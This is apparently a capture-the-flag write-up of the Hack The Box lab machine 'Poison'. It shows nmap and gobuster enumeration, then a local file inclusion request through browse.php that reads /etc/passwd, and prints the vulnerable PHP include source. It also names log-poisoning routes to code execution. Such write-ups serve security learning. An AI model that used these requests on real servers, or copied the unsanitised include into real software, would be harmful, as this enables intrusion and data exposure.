10.10.10.84 - Poison - LFI (Log Poisoning)
Summary:
vulnerable software : Misconfiguration of PHP/5.6.32, LFI system vulnerable : 10.10.10.84 vulnerability explanation : Local file inclusion in browse.php file. severity : critical
Enumeration:
1
====================================================================================
2
RUNNING NMAP TCP PORT ANALYSIS
3
====================================================================================
4
5
[+] Running only TCP port scan
6
7
Starting Nmap 7.70SVN ( https://nmap.org ) at 2019-02-01 22:05 GMT
8
Nmap scan report for 10.10.10.84
9
Host is up (0.11s latency).
10
11
PORT STATE SERVICE VERSION
12
22/tcp open ssh OpenSSH 7.2 (FreeBSD 20161230; protocol 2.0)
13
80/tcp open http Apache httpd 2.4.29 ((FreeBSD) PHP/5.6.32)
14
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
15
Aggressive OS guesses: FreeBSD 11.0-RELEASE - 12.0-CURRENT (97%), FreeBSD 11.0-STABLE (95%), FreeBSD 11.0-CURRENT (94%), FreeBSD 11.0-RELEASE (93%), FreeBSD 9.1-STABLE (91%), FreeBSD 12.0-CURRENT (90%), FreeBSD 7.0-RELEASE (90%), FreeBSD 7.0-RELEASE-p2 - 7.1-PRERELEASE (89%), FreeNAS 9.10 (FreeBSD 10.3-STABLE) (89%), Sony Playstation 4 or FreeBSD 10.2-RELEASE (89%)
16
No exact OS matches for host (test conditions non-ideal).
17
Network Distance: 2 hops
18
Service Info: OS: FreeBSD; CPE: cpe:/o:freebsd:freebsd
19
20
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
21
Nmap done: 1 IP address (1 host up) scanned in 13.29 seconds
22
Copied!
Url http://10.10.10.84/browse.php?file=listfiles.php lists few files on the server indicating that *.php and *.txt file extension is in use:
File info.php reveals the OS version, it will come important later on (nmap accurate with OS defection):
1
FreeBSD Poison 11.1-RELEASE FreeBSD 11.1-RELEASE #0 r321309: Fri Jul 21 02:08:28 UTC 2017 [email protected]:/usr/obj/usr/src/sys/GENERIC amd64
Copied!
File phpinfo.php exposing PHP 5.6.32 configuration:
Dangerous allow_url_fopen enabled, possibility of LFI
Directory discovery:
1
└──╼ $gobuster -u http://10.10.10.84/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -t 50 -x php
2
3
=====================================================
4
Gobuster v2.0.0 OJ Reeves (@TheColonial)
5
=====================================================
6
[+] Mode : dir
7
[+] Url/Domain : http://10.10.10.84/
8
[+] Threads : 50
9
[+] Wordlist : /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt
10
[+] Status codes : 200,204,301,302,307,403
11
[+] Extensions : php
12
[+] Timeout : 10s
13
=====================================================
14
2019/02/01 22:16:44 Starting gobuster
15
=====================================================
16
/index.php (Status: 200)
17
/info.php (Status: 200)
18
/browse.php (Status: 200)
19
/phpinfo.php (Status: 200)
20
=====================================================
21
2019/02/01 22:23:11 Finished
22
=====================================================
23
Copied!
Vulnerability exploitation:
Since allow_url_fopen was set to on, we could check for LFI vulnerability, in this case an attacker could include a local file /etc/passwd:
1
└──╼ $curl -k http://10.10.10.84/browse.php?file=/etc/passwd
2
# $FreeBSD: releng/11.1/etc/master.passwd 299365 2016-05-10 12:47:36Z bcr $
3
#
4
root:*:0:0:Charlie &:/root:/bin/csh
5
toor:*:0:0:Bourne-again Superuser:/root:
6
daemon:*:1:1:Owner of many system processes:/root:/usr/sbin/nologin
7
operator:*:2:5:System &:/:/usr/sbin/nologin
8
bin:*:3:7:Binaries Commands and Source:/:/usr/sbin/nologin
9
tty:*:4:65533:Tty Sandbox:/:/usr/sbin/nologin
10
kmem:*:5:65533:KMem Sandbox:/:/usr/sbin/nologin
11
games:*:7:13:Games pseudo-user:/:/usr/sbin/nologin
12
news:*:8:8:News Subsystem:/:/usr/sbin/nologin
13
man:*:9:9:Mister Man Pages:/usr/share/man:/usr/sbin/nologin
14
sshd:*:22:22:Secure Shell Daemon:/var/empty:/usr/sbin/nologin
15
smmsp:*:25:25:Sendmail Submission User:/var/spool/clientmqueue:/usr/sbin/nologin
16
mailnull:*:26:26:Sendmail Default User:/var/spool/mqueue:/usr/sbin/nologin
17
bind:*:53:53:Bind Sandbox:/:/usr/sbin/nologin
18
unbound:*:59:59:Unbound DNS Resolver:/var/unbound:/usr/sbin/nologin
19
proxy:*:62:62:Packet Filter pseudo-user:/nonexistent:/usr/sbin/nologin
20
_pflogd:*:64:64:pflogd privsep user:/var/empty:/usr/sbin/nologin
21
_dhcp:*:65:65:dhcp programs:/var/empty:/usr/sbin/nologin
22
uucp:*:66:66:UUCP pseudo-user:/var/spool/uucppublic:/usr/local/libexec/uucp/uucico
23
pop:*:68:6:Post Office Owner:/nonexistent:/usr/sbin/nologin
24
auditdistd:*:78:77:Auditdistd unprivileged user:/var/empty:/usr/sbin/nologin
25
www:*:80:80:World Wide Web Owner:/nonexistent:/usr/sbin/nologin
26
_ypldap:*:160:160:YP LDAP unprivileged user:/var/empty:/usr/sbin/nologin
27
hast:*:845:845:HAST unprivileged user:/var/empty:/usr/sbin/nologin
28
nobody:*:65534:65534:Unprivileged user:/nonexistent:/usr/sbin/nologin
29
_tss:*:601:601:TrouSerS user:/var/empty:/usr/sbin/nologin
30
messagebus:*:556:556:D-BUS Daemon User:/nonexistent:/usr/sbin/nologin
31
avahi:*:558:558:Avahi Daemon User:/nonexistent:/usr/sbin/nologin
32
cups:*:193:193:Cups Owner:/nonexistent:/usr/sbin/nologin
33
charix:*:1001:1001:charix:/home/charix:/bin/csh
34
Copied!
Local File Inclusion vulnerability can be pushed quite far under right conditions:
LFI -> RCE through PHPinfo.php
LFI -> RCE through Apache Log Poisoning
Source code of vulnerable browse.php file:
1
[email protected]:/usr/local/www/apache24/data % cat browse.php
2
<?php
3
include($_GET['file']);
4
?>
5
Copied!
Copy link